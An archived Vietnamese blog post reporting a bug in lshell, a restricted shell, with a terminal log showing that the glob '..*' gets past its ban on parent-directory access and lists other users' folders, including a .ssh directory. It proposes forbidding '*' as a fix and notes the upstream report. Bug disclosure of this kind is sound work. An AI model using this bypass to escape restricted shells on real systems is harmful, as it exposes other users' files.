This page is READ-ONLY. It is generated from the old site.
All timestamps are relative to 2013 (when this page is generated).
If you are looking for TeX support, please go to VietTUG.org

limited shell: bug found ...?

:(
Added by about 3 years ago  »  Votes: 1/1

Về limited shell (hay lshell), xem bài giới thiệu ở đây: http://viettug.org/blogs/438

Tưởng đâu an toàn thì hôm nay phát hiện ra một lỗi. Mặc dù đã hạn chế người dùng truy cập đến các thư mục mẹ, thì các lệnh như cd .., ls ../ sẽ cấm truy cập đúng như thiết kế. Tuy nhiên, khi dùng ls ..* thì dấu sao đại diện sẽ tự động hiểu cả thư mục mẹ. Điều này làm lộ các thông tin của hệ thống.

 1 $ cd ..                                                           # bị cấm, đúng thiết kế
 2 *** forbidden path -> "/root/../data/" 
 3 *** You have 98 warning(s) left, before getting kicked out.
 4 This incident has been reported.
 5 
 6 $ ls ..*                                                          # vượt qua giới hạn, lshell đã bị lừa
 7 hoangtrang      lshell.tgz      vanchutr
 8 
 9 $ du -hc ../*                                                     # bị cấm, đúng thiết kế
10 *** forbidden path -> "/root/../data/*" 
11 *** You have 97 warning(s) left, before getting kicked out.
12 This incident has been reported.
13 
14 $ du -hc ..*                                                      # lshell tiếp tục bị lừa
15 2.0K    ../.snap
16 3.5M    ../hoangtrang
17 4.0K    ../vanchutr/.ssh
18 8.0K    ../vanchutr
19 3.6M    ..
20 3.6M    total

Giải pháp tạm thời là không cho phép người dùng sử dụng dấu sao (*) trong tất cả các lệnh của họ.

Ref.: reported at sourceforge.net.


Comments